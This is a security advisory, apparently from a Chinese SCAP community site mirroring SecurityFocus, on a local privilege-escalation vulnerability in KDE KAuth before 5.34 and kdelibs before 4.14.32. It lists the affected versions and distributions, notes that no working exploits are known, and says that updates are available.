KDE kdelibs 4.10
KDE kdelibs 4.2.4
KDE kdelibs 3.5.10
KDE kdelibs 3.5.5
KDE kdelibs 3.5.4
KDE kdelibs 3.5.2
KDE kdelibs 3.4.3
KDE kdelibs 3.4.2
KDE kdelibs 3.4
KDE kdelibs 3.3.2
KDE kdelibs 3.3.1
KDE kdelibs 3.3
KDE kdelibs 3.2.2
KDE kdelibs 3.2.1
KDE kdelibs 3.2
KDE kdelibs 3.1.5
KDE kdelibs 3.1.4
KDE kdelibs 3.1.3
KDE kdelibs 3.1.2
KDE kdelibs 3.1.1
KDE kdelibs 3.1
KDE kdelibs 3.0
KDE kdelibs 2.1.2
KDE kdelibs 2.1.1
KDE kdelibs 2.1
KDE kdelibs 2.0.1
KDE kdelibs 2.0
KDE kdelibs 4.6.1
KDE kdelibs 4.6
KDE kdelibs 4.14
KDE kdelibs 4.13.97
KDE kdelibs 4.13.95
KDE kdelibs 4.13.90
KDE kdelibs 4.13.80
KDE kdelibs 4.12.97
KDE kdelibs 4.12.95
KDE kdelibs 4.12.90
KDE kdelibs 4.12.80
KDE kdelibs 4.12.5
KDE kdelibs 4.12.4
KDE kdelibs 4.12.3
KDE kdelibs 4.12.2
KDE kdelibs 4.12.1
KDE kdelibs 4.11.97
KDE kdelibs 4.11.95
KDE kdelibs 4.11.90
KDE kdelibs 4.11.80
KDE kdelibs 4.10.97
KDE kdelibs 4.10.2
KDE KAuth 5.30
KDE KAuth 5.1
Fedoraproject Fedora 26
Fedoraproject Fedora 25
Fedoraproject Fedora 24
Debian Linux 6.0 sparc
Debian Linux 6.0 s/390
Debian Linux 6.0 powerpc
Debian Linux 6.0 mips
Debian Linux 6.0 ia-64
Debian Linux 6.0 ia-32
Debian Linux 6.0 arm
Debian Linux 6.0 amd64
,KDE kdelibs 4.14.32
KDE KAuth 5.34

- 不受影响的程序版本

KDE kdelibs 4.14.32
KDE KAuth 5.34

- 漏洞讨论

KDE KAuth is prone to a local privilege-escalation vulnerability.

A local attacker may exploit this issue to gain elevated privileges on the affected system.

KDE KAuth versions prior to 5.34 and KDE Kdelibs versions prior to 4.14.32 are vulnerable.

- 漏洞利用

Currently, we are not aware of any working exploits. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 解决方案

Updates are available. Please see the references or vendor advisory for more information.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站